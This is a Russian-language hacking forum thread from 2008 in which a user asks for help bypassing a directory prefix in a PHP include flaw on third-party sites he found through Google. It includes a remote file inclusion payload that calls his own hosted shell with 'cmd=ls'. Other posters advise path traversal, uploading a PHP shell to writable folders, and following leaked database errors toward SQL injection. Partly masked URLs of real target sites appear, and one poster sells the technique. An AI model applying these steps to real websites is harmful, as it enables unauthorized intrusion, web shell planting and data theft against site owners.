Не могу обойти фильтрацию php-include
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Не могу обойти фильтрацию php-include - 2008-10-20 23:08:11.480000
|
|
|
lovop
Сообщений: 37
Оценки: 0
Присоединился: 2008-07-19 01:40:51.390000
|
Нашёл сайт с ошибкой php-инклюдинг. http://test.ru/index.php?page=asd Вылезло Warning: include(lib/asd.inc) [function.include]: failed to open stream: No such file or directory in /www/vhosts/test.ru/html/index.php on line 460 Warning: include() [function.include]: Failed opening 'lib/asd.inc' for inclusion (include_path='.:/usr/local/lib/php') in /www/vhosts/test.ru/html/index.php on line 460 Подставил запрос http://kadet.ru/index.php?page=http://lovop.narod.ru/girl.php?cmd=ls вылезло Warning: include(lib/http://lovop.narod.ru/girl.php?cmd=ls.inc) [function.include]: failed to open stream: No such file or directory in /www/vhosts/test.ru/html/index.php on line 460 Warning: include() [function.include]: Failed opening 'lib/http://lovop.narod.ru/girl.php?cmd=ls.inc' for inclusion (include_path='.:/usr/local/lib/php') in /www/vhosts/test.ru/html/index.php on line 460 То есть файл подключается из папки lib, как это обойти? Пробывал %00 - не помогло ps читал http://iz-news.ru/web/195/
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 02:08:44.283333
|
|
|
JenJen
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-13 18:51:01.436666
|
Никак ты не подставишь свой сайт, это только локальный инклуд. Залей любой свой файл на тот сайт и инклудь его. Тем более ты уже знаешь путь к www дире.
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 11:55:36.366666
|
|
|
forint
Сообщений: 15
Оценки: 0
Присоединился: 2008-02-10 16:29:48.393333
|
ну даже если ты зальешь файл куда либо ты его все равно не заинклюдишь , если он не лежит в директории lib/
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 19:29:56.323333
|
|
|
JenJen
Сообщений: 15
Оценки: 0
Присоединился: 2008-01-13 18:51:01.436666
|
forint с чего ты взял? А ты знаешь, что есть сиволы переходы вверх по папкам? ../ И если там safe_mode не врублен есть вероятность, что таки сможешь приинклудить.
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 20:09:11.106666
|
|
|
lovop
Сообщений: 37
Оценки: 0
Присоединился: 2008-07-19 01:40:51.390000
|
Как я понял нужно залить php-shell на этот сервак. Но для этого надо знать путь к директории с правами 777. Как же я такую найду?
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 20:11:56.356666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
аватарки и прочее. Думать надо. Кстати, не обязательно 777, достаточно 755
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 20:39:55.756666
|
|
|
lovop
Сообщений: 37
Оценки: 0
Присоединился: 2008-07-19 01:40:51.390000
|
Мне улыбнулась удача? Можно получить доступ к базе данных? Думаю что нет так как стоит using password: YES а я пароль не знаю. Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'U331601'@'bravd.store' (using password: YES) in /mnt/web4/30/89/51649189/htdocs/db/mysql4.php on line 48 Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource in /mnt/web4/30/89/51649189/htdocs/db/mysql4.php on line 330 Warning: mysql_errno(): supplied argument is not a valid MySQL-Link resource in /mnt/web4/30/89/51649189/htdocs/db/mysql4.php on line 331 phpBB : Critical Error Could not connect to the database
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-21 20:41:53.086666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
ссылку дай уже, секрет - в личку ЗЫЖ А это уже SQL-inject
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-22 21:54:27.290000
|
|
|
forint
Сообщений: 15
Оценки: 0
Присоединился: 2008-02-10 16:29:48.393333
|
quote:
ORIGINAL: JenJen forint с чего ты взял? А ты знаешь, что есть сиволы переходы вверх по папкам? ../ И если там safe_mode не врублен есть вероятность, что таки сможешь приинклудить. да ну.. честно ? и как тут это сделать ??? смотрим сюда - Warning: include(lib/asd.inc) а потом смотрим на результат попытки инклюда! Warning: include(lib/http://lovop.narod.ru/girl.php?cmd=ls.inc) ладно это .inc - это фигня но ,не lib/ то есть грубо говоря он приписывает ВСЕГДА к твоему урлу название директории lib/ в начало. тут даже etc/passwd не вызвать !!! quote:
А ты знаешь, что есть сиволы переходы вверх по папкам ну ка , поделись секретом !!!! что за символы такие волшебные , которые позволяют при ИНКЛЮДЕ обойти префикс!!??точно сам гари поттер поделился с тобой ими…
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-22 22:37:46.650000
|
|
|
forint
Сообщений: 15
Оценки: 0
Присоединился: 2008-02-10 16:29:48.393333
|
quote:
атарки и прочее. Думать надо. Кстати, не обязат quote:
ORIGINAL: Pashkela ссылку дай уже, секрет - в личку ЗЫЖ А это уже SQL-inject тоже мне блин хацкер !!! =))) первый сайт где php инклюд - hxxp://#####.xpandrally.com/ и вот этот тоже - hхххp://#####kadet.ru второй где он про sql - hxxp://#####.team-butterfly.org/ вы ребята порой меня убиваете … =))) я вот не спрашиваю у самого топик стартера , узнал что за сайты он ломануть пытается..
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-22 23:15:19.853333
|
|
|
lovop
Сообщений: 37
Оценки: 0
Присоединился: 2008-07-19 01:40:51.390000
|
quote:
ORIGINAL: forint я вот не спрашиваю у самого топик стартера , узнал что за сайты он ломануть пытается.. А зачем узнавать что это за сайты? Мне же их Гугл выдал, значит всё законно.
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-22 23:39:12.096666
|
|
|
forint
Сообщений: 15
Оценки: 0
Присоединился: 2008-02-10 16:29:48.393333
|
quote:
ORIGINAL: lovop quote:
ORIGINAL: forint я вот не спрашиваю у самого топик стартера , узнал что за сайты он ломануть пытается.. А зачем узнавать что это за сайты? Мне же их Гугл выдал, значит всё законно. не про законность идёт речь … а о внимательности и реальному соотношению к его статусу на форуме =)
|
|
|
RE: Не могу обойти фильтрацию php-include - 2008-10-25 04:39:41.463333
|
|
|
kolPeeX
Сообщений: 1456
Оценки: 0
Присоединился: 2007-01-25 14:57:57.683333
|
quote:
ORIGINAL: forint ну ка , поделись секретом !!!! что за символы такие волшебные , которые позволяют при ИНКЛЮДЕ обойти префикс!!??точно сам гари поттер поделился с тобой ими… 50$, icq 499083
|
|
|
|
|